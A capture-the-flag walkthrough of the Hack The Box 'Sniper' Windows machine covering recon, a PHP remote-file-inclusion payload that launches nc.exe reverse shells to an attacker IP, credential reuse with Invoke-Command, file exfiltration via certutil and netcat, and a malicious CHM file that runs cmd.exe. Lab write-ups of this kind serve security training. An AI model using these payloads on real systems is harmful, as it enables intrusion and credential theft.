Sniper
Sniper is a medium difficulty windows box that has web based exploits
Recon
We start off scanning Snipers IP 10.10.10.151 with nmap
nmap -T4 -A -v 10.10.10.151From Our Results we get the following services and ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET POST
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?Here we find port 80 is open, which means it must be hosting a website, upon navigating to 10.10.10.151:80 we find exactly that
for the most part we find nothing exceptionally interesting except.. a particular url http://10.10.10.151/blog/?lang=blog-en.php the ?lang= indicates that it may be vulnerable to RFI attacks but we have no way of getting a shell? Let's take a look at our nmap scan again, it seems SMB is also open, we can usue this to access a SMB Share of ours.
apt-get install samba
mkdir -r /tmp/sniper/smb
chmod 777 /tmp/sniper/smbFor the sake of anonymous access we'll have to make some changes to our SMB Config, we can find it at /etc/samba/smb.conf at the end of the file we'll have to add
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = YesAlso due note that the smb folder has the correct permissions
For these changes to take effect we'll have to restart the smb service we can do this with service smbd restart
Windows doesn't natively come with netcat due to this we'll have to download it and host it ourselves we can get it from here https://eternallybored.org/misc/netcat/ and place it in our smb share folder
once we have this, we should start a local netcat listener this can be done with
nc -lnvp 8888
ifconfig tun0 #get VPN IPperfect we are ready to connect back to our machine from the target, now to trigger our RFI vulnerability
<?php $answer = system('\\\\10.10.15.32\\pizza\\nc.exe 10.10.15.32 8888 -e powershell.exe');echo $answer."</br>"; ?>
http://10.10.10.151/blog/?lang=\\10.10.15.32\pizza\pizza.phponce our session is up and running we can go around looking for ways to escalate privileges to a user shell. Looking into C:/Users/ we find a user called Chris
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/9/2019 6:47 AM Administrator
d----- 4/11/2019 7:04 AM Chris
d-r--- 4/9/2019 6:47 AM Publicsince we have a site up we should check its host directory which in this case is C:/inetpub/wwwroot under this we find a directory called user and under it db.php in this we find a db connection with a password in clear text that being 36mEAhz/B8xQ~2VM we can safely assume that this is the user credentials.
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>Now we have user Creds, its time to login as user
Exploit
We can locally escalate user via the credentials we have and execute our payload to do this on powershell we'll
nc -lnvp 6464 #local listenerHuge thanks to @3r3bu5 for this tip
$user = "sniper\Chris" save a variable for chris as user
$password = ConvertTo-SecureString "36mEAhz/B8xQ~2VM" -AsPlainText -Force #convert the password to a plain-text string into password variable
$credential = New-Object System.Management.Automation.PSCredential ($user, $password) #create a PS credentials object of chris and the db password
Invoke-Command -ComputerName localhost -ScriptBlock { \\\\10.10.14.170\\pizza\\nc.exe 10.10.14.32 6464 -e powershell.exe } -Credential $credential #run nc from our smb share in context of ChrisNow that we have Chris we can get our first flag
cd ../Desktop
cat user.txtPost Exploitation
Now that we have user we can dig around for root.
exploring C:/ reveals a directory called Docs opening it gives us 2 files
Directory: C:\Docs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 9:31 AM 285 note.txt
-a---- 4/11/2019 9:17 AM 552607 php for dummies-trial.pdfgetting the output of note.txt shows us
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.Yikes! looks like the CEO isn't to happy with us.
Let's continue Digging around. Checking the Downloads directory for Chris shows us a instructions.chm looks interesting lets swipe it and have a look
we can use certutil to encode the file in base64 and make it much easier to transfer for that we'll use
certutil -encode "instructions.chm" instructions.chm.txtand to transfer it we'll use netcat yet again
nc -lp 1234 > instructions.chm.txt #on local
cat instructions.chm.txt | \\10.10.14.32\pizza\nc.exe -w 3 10.10.14.170 1234 #on targetnow we can head over to windows to decode our instructions.chm
certutil -decode instructions.chm.txt instructions.chm
Yikes definetely a lot of bad blood here.
Fortunately it gives us a hint, going back to the CEO's note he noted that he was waiting for the documentation. Given Chris created this it stands to reason that the documentation was a .chm Googling around we find that we can exploit chm!
Going back to windows we have to create CHM via html help workshop
Once we have the workshop setup we need to create a new project in it. Once we've done that we need to create a html file which will have our payload which is
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',cmd.exe, /c typeC:\Users\Administrator\Desktop\root.txt > C:/pizza/root.txt,'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>And edit the .hhp to include our malicious html
[OPTIONS]
[FILES]
Untitled1.htmand compile, once you have your chm we can transfer it over to our victim. To do this we'll use SimpleHTTPServer
python -m SimpleHTTPServer 8088 #start server in the same directory as payload
Invoke-WebRequest http://10.10.14.32:8088/pizza.chm -OutFile C:/Temp/pizza.chm #Download Payload to machineGreat but now how do we get root? Well the CEO did also say to "drop it here" so lets copy our malicious chm to C:\Docs and hope for the best
cp pizza.chm C:\Docs\And voila after a minute we should be having our root flag in C:/Temp or a session if you wanted it to be so.
Useful Links
Last updated